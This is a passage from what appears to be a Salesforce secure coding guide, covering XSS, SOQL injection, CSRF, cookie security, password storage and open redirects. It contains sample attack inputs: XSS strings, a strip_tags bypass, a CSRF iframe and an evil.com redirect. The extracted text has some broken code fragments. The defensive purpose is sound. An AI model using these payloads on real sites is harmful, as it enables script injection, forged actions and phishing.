Apache's StringEscapeUtils package which was not designed for security encoding and should not be
used.
Dangerous Programming Constructs
The following mechanisms do not have built-in auto-HTML encoding protection and should in general
be avoided whenever possible.
S-Controls and Custom JavaScript Sources
The <apex:includeScript> Visualforce component allows you to include a custom script on
the page. In these cases be very careful to validate that the content is sanitized and does not include
user-supplied data. For example, the following snippet is extremely vulnerable as it is including
user-supplied input as the value of the script text. The value provided by the tag is a URL to the JavaScript
to include. If an attacker can supply arbitrary data to this parameter (as in the example below), they can
potentially direct the victim to include any JavaScript file from any other web site.
<apex:includeScript value="{!$CurrentPage.parameters.userInput}" />
href="https://example.com/integration?sid={!$Api.Session_ID}&server={!$Api.Partner_Server_URL_130}”>Go
to portal</a>
Formula expressions can be function calls or include information about platform objects, a user’s
environment, system environment, and the request environment. An important feature of these
expressions is that data is not escaped during rendering. Since expressions are rendered on the server,
it is not possible to escape rendered data on the client using JavaScript or other client-side technology.
This can lead to potentially dangerous situations if the formula expression references non-system data
(i.e. potentially hostile or editable) and the expression itself is not wrapped in a function to escape the
output during rendering. A common vulnerability is created by the use of the {!$Request.*}
expression to access request parameters:
<html>
<head>
<title>{!$Request.title}</title>
</head>
<body>
Hello world!
28
Secure Coding Cross Site Scripting
</body>
</html>
This will cause the server to pull the title parameter from the request and embed it into the page. So,
the request
https://example.com/demo/hello.html?title=Hola
The standard mechanism to do server-side escaping is through the use of the JSENCODE, HTMLENCODE,
JSINHTMLENCODE, and URLENCODE functions or the traditional SUBSTITUTE formula tag. Given the
placement of the {!$Request.*} expression in the example, the above attack could be prevented
by using the following nested HTMLENCODE calls:
<html>
<head>
<title>
{!HTMLENCODE($Request.title)}
</title>
</head>
<body>
Hello world!
</body>
</html>
Depending on the placement of the tag and usage of the data, both the characters needing escaping
as well as their escaped counterparts may vary. For instance, this statement:
<script>var ret = "{!$Request.retURL}";</script>
would require that the double quote character be escaped with its URL encoded equivalent of %22
instead of the HTML escaped ", since it’s likely going to be used in a link. Otherwise, the request
https://example.com/demo/redirect.html?retURL=xyz%22%3Balert('xss')%3B%2F%2F
29
Secure Coding Cross Site Scripting
Additionally, the ret variable may need additional client-side escaping later in the page if it is used in
a way which may cause included HTML control characters to be interpreted. Examples of correct usage
are below:
<script>
// Encode for URL
var ret = "{!URLENCODE($Request.retURL)}";
window.location.href = ret;
</script>
<script>
// Encode for JS variable that is later used in HTML operation
var title = "{!JSINHTMLENCODE($Request.title)}";
document.getElementById('titleHeader').innerHTML = title;
</script>
<script>
// Standard JSENCODE to embed in JS variable not later used in
HTML
var pageNum = parseInt("{!JSENCODE($Request.PageNumber)}");
</script>
Formula tags can also be used to include platform object data. Although the data is taken directly from
the user’s org, it must still be escaped before use to prevent users from executing code in the context
of other users (potentially those with higher privilege levels.) While these types of attacks would need
to be performed by users within the same organization, they would undermine the organization’s user
roles and reduce the integrity of auditing records. Additionally, many organizations contain data which
has been imported from external sources, which may not have been screened for malicious content.
General Guidance for Other Platforms
This section briefly summarizes XSS best practices on other platforms.
Allowing HTML injection
If your application allows users to include HTML tags by design, you must exercise great caution in what
tags are allowed. The following tags may allow injection of script code directly or via attribute values
and should not be allowed. See HTML 5 Security Cheat Sheet for details.
Unsafe HTML Tags:
<applet> <body> <button> <embed> <form> <frame> <frameset> <html>
<iframe> <image> <ilayer> <input> <layer> <link> <math> <meta>
<object> <script> <style> <video>
Be aware that the above list cannot be exhaustive. Similarly, there is no complete list of JavaScript event
handler names (although see this page on Quirksmode), so there can be no perfect list of bad HTML
element attribute names.
Instead, it makes more sense to create a well-defined known-good subset of HTML elements and
attributes. Using your programming language’s HTML or XML parsing library, create an HTML input
handling routine that throws away all HTML elements and attributes not on the known-good list. This
way, you can still allow a wide range of text formatting options without taking on unnecessary XSS risk.
Creating such an input validator is usually around 100 lines of code in a language like Python or PHP; it
might be more in Java but is still very tractable.
HTTP Only Cookies
30
Secure Coding Cross Site Scripting
When possible, set the HttpOnly attribute on your cookies. This flag tells the browser to reveal the cookie
only over HTTP or HTTPS connections, but to have document.cookie evaluate to a blank string when
JavaScript code tries to read it. (Some browsers do still let JavaScript code overwrite or append to
document.cookie, however.) If your application does require the ability for JavaScript to read the cookie,
then you won’t be able to set HttpOnly. Otherwise, you might as well set this flag.
Note that HttpOnly is not a defense against XSS, it is only a way to briefly slow down attackers exploiting
XSS with the simplest possible attack payloads. It is not a bug or vulnerability for the HttpOnly flag to be
absent.
Stored XSS Resulting from Arbitrary User Uploaded Content
Applications such as Content Management, Email Marketing, etc. may need to allow legitimate users to
create and/or upload custom HTML, Javascript or files. This feature could be misused to launch XSS
attacks. For instance, a lower privileged user could attack an administrator by creating a malicious HTML
file that steals session cookies. The recommended protection is to serve such arbitrary content from a
separate domain outside of the session cookie's scope.
Let’s say cookies are scoped to https://app.site.com. Even if customers can upload arbitrary
content, you can always serve the content from an alternate domain that is outside of the scoping of
any trusted cookies (session cookies and other sensitive information). As an example, pages on
https://app.site.com would reference customer-uploaded HTML templates as IFRAMES using
a link to
https://content.site.com/cust1/templates?templId=13&auth=someRandomAuthenticationToken
The authentication token would substitute for the session cookie since sessions scoped to
app.site.com would not be sent to content.site.com. If the data being stored is sensitive, a one
time use or short lived token should be used. This is the method that Salesforce uses for our content
product.
HTTP Response Splitting
HTTP response splitting is a vulnerability closely related to XSS, and for which the same defensive strategies
apply. Response splitting occurs when user data is inserted into an HTTP header returned to the client.
Instead of inserting malicious script, the attack is to insert additional newline characters. Because headers
and the response body are delimited by newlines in HTTP, this allows the attacker to insert their own
headers and even construct their own page body (which might have an XSS payload inside). To prevent
HTTP response splitting, filter ‘\n’ and ‘\r’ from any output used in an HTTP header.
ASP.NET
ASP.NET provides several built-in mechanisms to help prevent XSS, and Microsoft supplies several free
tools for identifying and preventing XSS in sites built with .NET technology.
An excellent general discussion of preventing XSS in ASP.NET 1.1 and 2.0 can be found at the Microsoft
Patterns & Practices site: Howto Prevent XSS in ASP
By default, ASP.NET enables request validation on all pages, to prevent accepting of input containing
unencoded HTML. (For more details see http://www.asp.net/learn/whitepapers/request-validation/.)
Verify in your Machine.config and Web.config that you have not disabled request validation.
Identify and correct any pages that may have disabled it individually by searching for the
ValidateRequest request attribute in the page declaration tag. If this attribute is not present, it
defaults to true.
Input Validation
For server controls in ASP.NET, it is simple to add server-side input validation using
<asp:RegularExpressionValidator>.
31
Secure Coding Cross Site Scripting
If you are not using server controls, you can use the Regex class in the
System.Text.RegularExpressions namespace or use other supporting classes for validation.
For example regular expressions and tips on other validation routines for numbers, dates, and URL strings,
see Microsoft Patterns & Practices: “How To: Protect from Injection Attacks in ASP.NET”.
Output Filtering & Encoding
The System.Web.HttpUtility class provides convenient methods, HtmlEncode and
UrlEncode for escaping output to pages. These methods are safe, but follow a “blocklist” approach
that encodes only a few characters known to be dangerous. Microsoft also makes available the AntiXSS
Library that follows a more restrictive approach, encoding all characters not in an extensive,
internationalized allowlist.
Tools and Testing
Microsoft provides a free static analysis tool, CAT.NET. CAT.NET is a snap-in to Visual Studio that helps
identify XSS as well as several other classes of security flaw. Visual Studio has built-in static analysis
features that can help identify security
vulnerabilities:https://learn.microsoft.com/en-us/visualstudio/code-quality/overview-of-code-analysis-for-managed-code
Java
J2EE web applications have perhaps the greatest diversity of frameworks available for handling user
input and creating pages. Several strong, all-purpose libraries are available, but it is important to
understand what your particular platform provides.
Input Filtering
Take advantage of built-in framework tools to validate input as it is being used to generate business or
model objects. In Struts, input validation rules can be defined in XML using the Validator Plugin in your
struts-config.xml:
<plug-in className="org.apache.struts.validator.ValidatorPlugIn">
<set-property property="pathnames"
value="/WEB-INF/validator-rules.xml"/>
</plug-in>
Or you can build programmatic validation directly into your form beans with regular expressions.
Learn more about Java regular expressions here: Java Regex Documentation.
The Spring Framework also provides utilities for building automatic validation into data binding. You
can implement the org.springframework.validation.Validator interface with the
help of Spring’s ValidationUtils class to protect your business objects. Get more information
here: Spring Validation.
A more generic approach, applicable to any kind of Java object, is presented by the OVal object validation
framework. OVal allows constraints on objects to be declared with annotations, through POJOs or in
XML, and expressing custom constraints as Java classes or in a variety of scripting languages. The system
is quite powerful, implements Programming by Contract features using AspectJ, and provides some
built-in support for frameworks like Spring. Learn more about OVal at: OVal
Output Filtering and Encoding
JSTL tags such as <c:out> have the excapeXml attribute set to true by default, This default behavior
ensures that HTML special characters are entity-encoded and prevents many XSS attacks. If any tags in
your application set escapeXml="false" (such as for outputting the Japanese yen symbol) you
need to apply some other escaping strategy. For JSF, the tag attribute is escape, and is also set to true
by default for <h:outputText> and <h:outputFormat>.
32
Secure Coding Cross Site Scripting
Other page generation systems do not always escape output by default. Freemarker is one example. All
application data included in a Freemarker template should be surrounded with an <#escape> directive
to do output encoding (e.g. <#escape x as x?html>) or by manually adding ?html (or
?js_string for JavaScript contexts) to each expression (e.g. ${username?html}).
Custom JSP tags or direct inclusion of user data variables with JSP expressions (e.g. <%=
request.getHeader("HTTP_REFERER") %>) or scriptlets (e.g. <%
out.println(request.getHeader("HTTP_REFERER") %>) should be avoided.
If you are using a custom page-generation system, one that does not provide output escaping
mechanisms, or building directly with scriptlets, there are several output encoding libraries available.
The OWASP Enterprise Security API for Java is a mature project that offers a variety of security services
to J2EE applications. The org.owasp.esapi.codecs package provides classes for encoding
output springs safely for HTML, JavaScript and several other contexts. Get it here: OWASP Enterprise
Security API (ESAPI)
PHP
Input Filtering
As of PHP 5.2.0, data filtering is a part of the PHP Core. The package documentation is available at: PHP
Data Filtering Library.
Two types of filters can be declared: sanitization filters that strip or encode certain characters, and
validation filters that can apply business logic rules to inputs.
Output Encoding
PHP provides two built-in string functions for encoding HTML output. htmlspecialchars encodes
only &, ", ', <, and >, while htmlentities encodes all HTML characters with defined entities.
For bulletin-board like functionality where HTML content is intended to be included in output, the
strip_tags function is also available to return a string with all HTML and PHP tags removed, but
because this function is implemented with a regex that does not validate that incoming strings are
well-formed HTML, partial or broken tags may be able to bypass the system. For example, the string
<<b>script>alert('xss');<</b>/script> might have the <b> and </b> tags
removed, leaving the vulnerable string <script>alert('xss');</script>. If you are going
to rely on this function, input must be sent to an HTML validating and tidying program first. (Note that
in PHP 5.2.6, strip_tags does appear to work, reducing the aforementioned attack string to
alert('xss'). Does it work in your version?)
33
CHAPTER 4 Secure Coding SQL Injection
Understand how SOQL injection works and how to secure SOQL Queries.
Sample Vulnerability
Consider this code in an Apex controller that constructs a SOQL query to retrieve information about a
custom object in Salesforce called 'Personnel. The userInputTitle variable is user input from a
web page form, and is concatenated into the query string where clause to form the final request to the
database.
public List<Personnel__c> whereclause_records { get; set; }
public String userInputTitle { get; set; }
if (!Schema.sObjectType.Personnel__c.fields.Name.isAccessible()
||
!Schema.sObjectType.Personnel__c.fields.Role__c.isAccessible()
||
!Schema.sObjectType.Personnel__c.fields.Title__c.isAccessible() ||
!Schema.sObjectType.Personnel__c.fields.Age__c.isAccessible())
{
return null; // You might want to handle this more gracefully
34
Secure Coding SQL Injection
The %' finishes up the wildcard matching for Title__c and ends the string. The user input appends
to the query, adding a filter for the performance rating of the Personnel object. The attacker’s string has
now changed the way the query is behaving and gives them access to information that the developer
didn’t intend.
SOQL injection can be seen as a bypass of CRUD and FLS checks. Since the only action that is supported is
SELECT, the worst that can happen is that a user gets access to data that they can’t see. Similarly, not
checking a user’s access levels before returning data can have a significant impact.
Is My Application Vulnerable?
When you use dynamic queries without enforcing the use of bind variables, also known as parameterized
queries, your application becomes vulnerable to security threats. To keep your data safe, it's important
to always use parameterized queries when working with dynamic queries.
35
Secure Coding SQL Injection
!Schema.sObjectType.Personnel__c.fields.Title__c.isAccessible() ||
!Schema.sObjectType.Personnel__c.fields.Age__c.isAccessible())
{
return null;
}
FROM Personnel__c
WHERE Title__c LIKE :qTitle];
}
You’ll notice there’s less code here than in our manual example. In Apex, writing a query inside braces
will directly execute the query inside it without calling database.query(). The variable prepended
with a colon is a bind variable. The database layer, which in this case is SOQL, treats everything in that
variable as data. This applies even if there are unusual characters in the variable. However, no matter
what the user types in, they can’t break out of the intended behavior of the query and manipulate the
query.
Parameterized queries are limited to binding a variable inside the WHERE clause of the query. This means
that if you want dynamic fields or object names, you can’t replace your dynamic query with a
parameterized one. So, how can you make sure that your queries are safe? In Apex, you can write a
sanitizing function:
public boolean isSafeObject(String objName) {
Map<String, Schema.SObjectType> schemaMap =
Schema.getGlobalDescribe();
Schema.SObjectType myObj = schemaMap.get(objName);
if (!isSafeObject(objName)) {
return null;
} else {
if
36
Secure Coding SQL Injection
(!Schema.getGlobalDescribe().get(objName).fields.getMap().get('Name').isAccessible()
||
!Schema.getGlobalDescribe().get(objName).fields.getMap().get('Address').isAccessible())
{
return null;
}
List<SObject> records = Database.query(myQuery); // Added
List<SObject> type for records
return null; // You should return something meaningful here
}
}
Ensure that the object name provided by the user is valid and that the user has the necessary access
permissions. Check for any invalid characters that could be used for SOQL injection and confirm that the
user has access to the object. This not only protects against SOQL injection but also serves as a CRUD
check.
As previously mentioned, SOQL injection can be seen as another form of CRUD/FLS bypass. However,
there’s one final customization scenario for your SOQL queries to consider. If you know the object and
the filtering criteria, but you don’t know if you must access the field, then it’s similar scenario as this code:
public boolean isSafeField(String fieldName, String objName) {
Map<String, Schema.SObjectType> schemaMap =
Schema.getGlobalDescribe(); // Moved inside the method
Schema.SObjectType myObj = schemaMap.get(objName);
37
Secure Coding SQL Injection
perform logic)
}
Again, in this example, we haven’t only prevented SOQL injection but also have carried out our CRUD
and FLS checks for the object and the associated fields.
Use the methods that we’ve discussed so far in situations. If you're considering alternative methods to
prevent SOQL injection, you're likely to approach the problem correctly, increasing your chances of
success with these methods. However, for other languages and frameworks if you don’t have the APIs
that Salesforce provides, we ’ll briefly cover other sanitization methods.
38
Secure Coding SQL Injection
Method description
boolean or integer. If there's an issue converting
data types, it means the data is wrong. You can
then safely stop the process.
Whitelisting is similar, if you have an input that you
know the structure of. For example, you can select
fields from an object by verifying user input against
a predefined list of field names.
Typecasting example:
String query = 'SELECT Name,
Address FROM Object__c WHERE
isActive = ' + (input ? 'TRUE' :
'FALSE');
Whitelisting example:
Set<String> fields = new
Set<String>();
fields.add('myField1');
fields.add('myField2');
fields.add('myField3');
if (!fields.contains(inputField))
{
throw new
CustomException('Invalid field:
' + inputField); // Customize
error handling as needed
}
These methods are good for preventing injection attacks, but don’t guarantee that the user will have
access to the objects returned. Hence we also don’t recommend using these methods except in edge
cases.
39
Secure Coding SQL Injection
to. Alternatively, when making SOQL calls in Apex Code, no CRUD/FLS checks are performed (and sharing
checks are only performed if the 'with sharing' keyword is used). Allowing end users to control the
contents of a SOQL query issued in Apex code is a serious security vulnerability, but it’s not a vulnerability
when end users control the contents of a SOQL query via the API.
40
Secure Coding SQL Injection
41
Secure Coding SQL Injection
PHP (PDO) • Use the PHP Data Objects PHP Security guidance for
(PDO) extension for Prepared Statements and Stored
parameterized queries and Procedures
prepared statements. Note
that
• PDO::prepare provides
good SQL injection defenses,
but this only guarantees
protection if the underlying
PDO driver and database
support parameterized
queries natively.
• Always sanitize data before
passing it to
PDO::prepare as a
defense-in-depth measure.
• Use regular expressions to
limit input values to
expected formats.
42
Secure Coding SQL Injection
entered_password])<br>
43
Secure Coding SQL Injection
Stored procedures that only use static SQL text are also acceptable, but beware of stored procedures
that use exec or similar constructs to build dynamic SQL internally.
44
CHAPTER 5 Secure Coding Cross Site Request Forgery
Learn how to protect yourself from Cross-site Request Forgery (CSRF), a security threat where malicious
websites can manipulate your browser to perform actions without your consent on other sites where
you are logged in.
Sample Vulnerability
Consider a hypothetical contact management application at https://example.com/. Without CSRF
protection, if a user visits a malicious website while still logged in to example.com, the following HTML
in the malicious site’s page can cause all of their contacts to be deleted.
<iframe
src="https://example.com/addressBook?action=deleteAll&confirm=yes">
Is My Application Vulnerable?
All web applications are vulnerable to CSRF by default. Unless you have specifically engineered protections
or are automatically protected by your framework, your application is probably vulnerable. Applications
built on the Apex and Visualforce platforms are protected by default. Anti-CSRF protections are available
for most major application platforms but are often not enabled by default.
45
Secure Coding Cross Site Request Forgery
This screen shot of the Burp proxy shows an example of a request vulnerable to CSRF. All of the parameters
to the application (action, confirm) are predictable.
The next screen shot has a parameter named antiForgery that looks hard to guess:
46
Secure Coding Cross Site Request Forgery
But if we log out as “bob” and log back in as “charlie”, we see that the antiForgery value stays the same.
47
Secure Coding Cross Site Request Forgery
This application global anti-forgery token could be observed by one user and used to attack other users.
A secure anti-CSRF mechanism should create a different and unpredictable token for each user session
— Bob should get a different antiforgery value each time he logs in, and so should Charlie. Be sure to
use the capabilities of the proxy to test that actions fail if the token is removed or changed, or a valid
token for another user is substituted.
Additional information on testing for CSRF can be found at:
http://www.owasp.org/index.php/Testing_for_CSRF_(OWASP-SM-005)
48
Secure Coding Cross Site Request Forgery
(By protecting only POST requests, Salesforce follows the convention and recommendation that GET
requests be safe in that they do not alter significant data on the server side or have other significant
side-effects. That is, you should not be using GET requests to change application state, and so GET
requests should not need CSRF protection. See Section 9.1 of RFC 2616, HTTP 1.1 for more discussion of
this distinction.)
By making a non-safe action formulation with a GET request, the developer might bypass our built-in
defenses without realizing the risk. For example, let’s say you have a custom controller where you take
the object ID as an input parameter, then use that input parameter in your own SOQL call, and then
delete the resulting object (a non-safe, state-changing action). Consider the following Visualforce code
snippet:
<apex:page controller="myClass" action="{!init}"></apex:page>
In this case, the developer has unknowingly bypassed the anti-CSRF controls by writing code that changes
state on a GET request. The id parameter is read and used in the code. The anti-CSRF token is never
read or validated. An attacker web page may have sent the user to this page via CSRF attack and could
have provided any value they wish for the id parameter.
Instead, use an <apex:form> block, as described in the developer documentation. Note how it is
safe to use getParameters to select the account, but that the update account; statement — a
non-safe state change — is done in an <apex:form> action. The form is POSTed and the anti-forgery
token validated implicitly.
public with sharing class MyController {
public MyController() {
account = [select id, name, site from Account
where id
=:ApexPages.currentPage().getParameters().get('id')];
}
49
Secure Coding Cross Site Request Forgery
}
}
General Guidance
All requests that create, update or delete data or have side-effects require protection against CSRF.
The most reliable method is to include an anti-CSRF token as a hidden input with every application
action.
This token should be included in all forms built by the genuine application and validated to be present
and correct before form data is accepted and acted upon.
Use the POST method for requests requiring protection to avoid disclosing the token value in Referer
headers.
Token values must be unique per user session and unpredictable.
For more information and traditional defenses, see the following articles:
• http://www.owasp.org/index.php/Cross-Site_Request_Forgery
• http://www.cgisecurity.com/csrf-faq.html
ASP.NET
ASP.NET provides two strategies for preventing CSRF. Applications that use the ASP.NET ViewState
mechanism can protect against CSRF by setting a ViewStateUserKey during Page_Init.
See the following articles at MSDN for more information on using ViewStateUserKey:Be sure to
set the value to a per-user, unique and unpredictable value.
• http://msdn.microsoft.com/en-us/library/system.web.ui.page.viewstateuserkey.aspx
• http://msdn.microsoft.com/en-us/library/ms972969.aspx
ASP.NET applications that do not use the ViewState mechanism can use the AntiForgeryToken
feature from the System.Web.Mvc package. See the following MSDN documentation:
• http://msdn.microsoft.com/en-us/library/system.web.mvc.htmlhelper.antiforgerytoken.aspx
If using the AntiForgeryToken, it must be added to and validated for every sensitive action in the
application. Again, a “sensitive” action for these purposes is one that changes server-side state, like
creating, updating, or deleting data.
Java
Several libraries are available for protecting Java applications from CSRF. The HDIV (HTTP Data Integrity
Validator) framework’s Anti-Cross Site Request Forgery Token feature can be easily integrated into Struts
1.x, Struts 2.x, Spring MVC and JSTL applications. The Spring Webflow system includes a unique identifier
with each request, but this identifier is not sufficiently random to provide CSRF protection, so use of
HDIV is recommended. Download it at:
50
Secure Coding Cross Site Request Forgery
51
CHAPTER 6 Secure Coding Secure Communications
Learn how to ensure application security outside Salesforce. Mandate HTTPS and setting the Secure flag
for cookies that store sensitive data.
Sample Vulnerability
Failure to set the Secure flag for security-critical cookies is the most common vulnerability in this category.
Simply setting a cookie over an HTTPS connection doesn’t prevent it from being returned over HTTP
unless the Secure flag is set. Even if your site doesn’t have an HTTP version, malicious parties on the network
will be able to steal session cookies.
For example, the attacker can insert references to HTTP URLs to your application into sites that your users
are likely to visit. Assume your application is https://app.example.com, and your users frequent a discussion
forum or blog at http://exampleappblog.com. ExampleAppBlog allows commenters to include limited
HTML in their posts, including img tags. A commenter inserts HTML into one of their comments like the
following:
<img src="http://app.example.com/example-logo.png" />
When a user authenticated to app.example.com views this comment, their browser will fire off a request
for example-logo.png over an insecure HTTP connection. Since the app.example.com cookie wasn’t set
Secure, the browser will include the cookie over this connection — exposing it to the network.)
When logging into your website's CMS over an insecure public Wi-Fi network at a coffee shop, an attacker
on the same network could perform a Man-in-the-Middle (MiTM) attack. Logging into your site over
HTTP without the Secure flag enabled allows attackers to steal your cookie. Even with HTTPS, attackers
can sometimes downgrade your connection to HTTP using SSL stripping.
52
Secure Coding Secure Communications
Is My Application Vulnerable?
After logging in, change the “https” in the URL bar of the browser to “http”. If you’re still logged in, your
application is vulnerable.
Follow the simple test procedures for all applications to determine if they follow the guidelines.
Session cookies that authenticate a user to the application must always be marked Secure.
Examine the contents of any cookies not identified as secure. Do they contain information, which is
sensitive, personally identifiable (such as an email address), or which influences the behavior of the
application? For any such cookies the server must set the Secure flag.
53
Secure Coding Secure Communications
You can easily test web server configuration for HTTPS using the online tool provided by SSL Labs at
https://www.ssllabs.com/ssldb/. Simply type in the URL for your server to get a detailed report.
If your assessment shows severe errors in the SSL Labs assessment, they must be corrected before your
site can be integrated with AppExchange.
SSL Labs publish a list on their SSL server test page of the 10 most recent worst-rated sites. If your site
scores poorly, it shows up onthatlist for a while. If your site scores well, it can appear on the list of recent
best-rated sites.
An alternative SSL testing tool is SSLScan on GitHub.
54
Secure Coding Secure Communications
<transport-guarantee>CONFIDENTIAL</transport-guarantee>
This signals to the container that user data must be kept confidential and implies the use of HTTPS
for this application. Some additional configuration is required to support SSL — see the
documentation specific to your web container.
– Apache Tomcat 5.5: http://tomcat.apache.org/tomcat-5.5-doc/ssl-howto.html
– Apache Tomcat 6.0: http://tomcat.apache.org/tomcat-6.0-doc/ssl-howto.html
The GlassFish application server supports configuration in versions 2.1 and 3.0, using the following
syntax in sun-web.xml
<?xml version="1.0" encoding="UTF-8"?>
<sun-web-app>
<session-config>
<cookie-properties>
<property name="cookieSecure" value="[true|false|dynamic]"/>
</cookie-properties>
</session-config>
</sun-web-app>
The upcoming version of the Servlet Specification (Servlet 3.0) will provide additional support for
programmatic configuration of session cookie security using the new
javax.servlet.SessionCookieConfig class.
• For PHP, always set the boolean parameter secure to true when calling setcookie. This
value is set to false by default.
Use session_regenerate_id when logging in users to prevent session fixation attacks.
For more guidance on PHP security, see:
– http://phpsec.org/projects/guide/4.html
• For Ruby on Rails, always set the boolean parameter secure to true when creating a
CGI::Cookie object. This value is set to false by default.
Use reset_session when logging in users to prevent session fixation attacks.
For more guidance on Ruby on Rails security, see https://guides.rubyonrails.org/security.html.
55
Secure Coding Secure Communications
• For Apache, use the SSLCipherSuite directive with mod_ssl to configure available cipher suites.
Use only HIGH ciphers and disable SSLv2. For complete configuration information, see
http://httpd.apache.org/docs/2.0/mod/mod_ssl.html#sslciphersuite.
56
CHAPTER 7 Storing Sensitive Data
Understand sensitive data and learn how to employ robust encryption, access controls, and secure
storage solutions to protect it.
Hardcoded Secrets
Storing sensitive information in your application's source code isn’t advisable since anyone with access
to the code can view the secrets in clear text.
Debug Logs
Don’t use any sensitive data (usernames, passwords, names, contact information, opportunity information,
PII, and so on) for debug logs in apex. The debug logs include standard Salesforce logs using
system.debug() methods or custom debug logs created by the application. Avoid sending sensitive
information to 3rd party by emails or other means as part of reporting possible errors.
57
Storing Sensitive Data
Salesforce.com Integrations
For external applications, ensure no user credentials (usernames, passwords, or session IDs) are used in
external databases. In order to integrate an external application with Salesforce.com user accounts, use
the OAuth flow. More information about implementing OAuth can be found at here.
Sample Vulnerability
If your application copies and stores sensitive data that originated at salesforce.com, take extra precaution.
Salesforce.com treats data threats seriously, and a breach could impact your relationship with them if
you're a partner.
Storing passwords in plaintext or weakly hashed formats (like MD5) exposes your application to
widespread user exploitation if attackers gain database access (for example, through backup theft or
SQL injection). If attackers retrieve passwords through SQL injection or data exposure, they can
compromise user accounts on a large scale.
Is My Application Vulnerable?
If your application stores the salesforce.com user password, your application is vulnerable.
Collecting additional sensitive data renders your application non-compliant with industry standards,
potentially leading to significant privacy breaches and legal repercussions.
58
Storing Sensitive Data
Therefore, developers have historically used a cryptographic hash function, a one-way function that is
(supposedly) computationally infeasible to reverse. They then store the hash output:
hash = md5 # or SHA1, or Tiger, or SHA512, etc.
storedPasswordHash = hash(password)
To authenticate users, the application hashes the provided password and compares it to the stored
password:
authenticated? = hash(password) == storedPasswordHash
The goal is to make attackers have to compute a larger dictionary of hashes: they now have to compute
2saltSize (for example, 216 for a 2-byte salt) hashes for each item in their password dictionary.
However, a salted password hash only makes it more expensive to pre-compute the attack against a
large password database. It doesn’t protect from attempts to brute-force individual passwords when
the hash and salt are known. The main issue is the computing cost; a single round of MD5 or SHA-1 no
longer sufficiently slows down attackers. Fast, cheap and highly parallel computation on specialized
hardware or commodity compute clusters makes brute force search with a dictionary affordable and
accessible, even to adversaries with few resources.
Therefore, we need a solution that significantly slows down the attacker but doesn’t slow down our
application by too much. The idea is that we tune the hashing function to be pessimal; Provos and
Mazières use a modified form of the Blowfish cipher to pessimize its already-slow setup time. Using
bcrypt is a fine solution, but it’s also easy to build a tunably slow hash function using the standard library
of most programming languages.
The benefit of this approach is that it slows down the attacker greatly, but for the application to verify a
single password candidate still takes essentially no time. (Additionally, since login actions are such a
small fraction of all application traffic, it’s OK if verification took an entire 0.5 seconds or more.)
59
Storing Sensitive Data
General Guidance
When storing sensitive information on a machine:
• All authentication secrets must be encrypted when stored on disk, including passwords, API Tokens,
and OAuth Tokens.
• Store secrets in vendor-provided key stores (macOS/iOS keychain, Android keystore, Windows DP-API
registry) for security compliance.
60
Storing Sensitive Data
• For services running on servers that must boot without user interaction, store secrets in a database
encrypted with a key not available to the database process. The application layer provides the key
as needed to the database at runtime or decrypts/encrypts as needed in its own process space.
• Don’t store any cryptographic keys used for protecting secrets in your application code
• Be cautious of the algorithms and ciphers used in any cryptographic operations
• Salt hashes, and if possible store salts and hashes separately
• Use strong platform cryptographic solutions
• Check if frameworks/platforms have already addressed the problem
• Use SSL/TLS to transmit sensitive data
The following list provides you with the guidelines to protect your application:
• ASP.NET provides access to the Windows CryptoAPIs and Data Protection API (DPAPI). Use the storage
of sensitive information like passwords and encryption keys if the DataProtectionPermission has been
granted to the code. Generally, the machine key is used to encrypt and decrypt sensitive data at the
risk that if the machine is compromised malicious code could potentially decrypt any stored secrets.
More information on this topic can be found here:
– Building Secure .NET Applications: Storing Secrets
– .NET Framework 4 Cryptographic Services
The best solution for ASP.NET is to use a hardware device like a cryptographic smartcard or Hardware
Security Module (HSM) with the underlying Crypto API and a vendor-supplied CSP.
• Java provides the KeyStore class for storing cryptographic keys. By default a flat file is used on the
server that’s encrypted with a password. For this reason, an alternative Cryptographic Service Provider
(CSP) is recommended. The strongest solution for Java is to rely on a hardware solution for securely
storing cryptographic keys. These keys such as a cryptographic smartcard or Hardware Security
Module (HSM) are accessible by using the vendor's supplied CSP in that java.security configuration
file. For more information on installing Java CSPs, consult the Java Cryptography Architecture (JCA)
Reference Guide. When not using a CSP, if the product is a client application, you must use JAVA
bindings to store the passphrase protecting the keystore in the vendor provided key store. Never
store the passphrase in source code or in a property file. For server java solutions, follow the general
guidance of making the passphrase protecting the keystore unavailable to the database process
storing credentials.
A Java implementation of bcrypt is called jBCrypt.
• PHP generally doesn't provide cryptographically secure random number generators. Make use of
/dev/urandom as the source for random numbers.
Note: But, with the introduction of PHP 7.x, there is now a built-in cryptographically secure
random number generator function called random_int(). This function can be used for
generating secure random numbers in PHP 7.x and later versions. See random_int.
Use the mcrypt library for cryptography operations. Salted hashes and salts could be subsequently
stored in a database.
A framework called phpass offers "OpenBSD-style Blowfish-based bcrypt" for PHP. For client apps,
you must use native bindings to store user secrets in the vendor-provided key store.
• For Ruby on Rails, there’s a copy of bcrypt called bcrypt-ruby. For client apps, you must use ruby
bindings to store secrets in the vendor provided key store.
61
Storing Sensitive Data
• For Python, use a module that interacts with the vendor-provided keystores such as the python
keyring module.
• For Flash/Air apps, use the Encrypted Local Store that contains bindings to use vendor-provided
keystores to store secrets.
62
CHAPTER 8 Arbitrary Redirect
5. When Alice logs in, the application sends a redirect response to P, so Alice can get right back to
work: HTTP/1.1 302 Found
Location: <b><font color="red">/someImportantAction.jsp</font></b>
The problem arises when the application performs dynamic redirects to a user controlled value, which
allows a malicious attacker redirect users to any URL indiscriminately.
This allows an attacker to perform phishing attacks that looks more legitimate, for example:
Legitimate redirect: https://www.example.com/home.jsp?retURL=login.jsp
The “retURL” parameter is dynamic and can be controlled by the user easily from the browser address
bar, when replacing it’s value (login.jsp) with any other page or URL, instead of being redirected to the
login page the user will be redirected to any valid page or URL it has been replaced with. Attacker crafted
URL:
https://www.example.com.fake.bad.co.uk/login.jsp
63
Arbitrary Redirect
which decodes to
http://www.evil.com/
This URL looks like (and is) a true example.com URL but will actually send people to evil.com. If evil.com
hosts a convincing phishing attack page for example.com, example.com users may very well be tricked
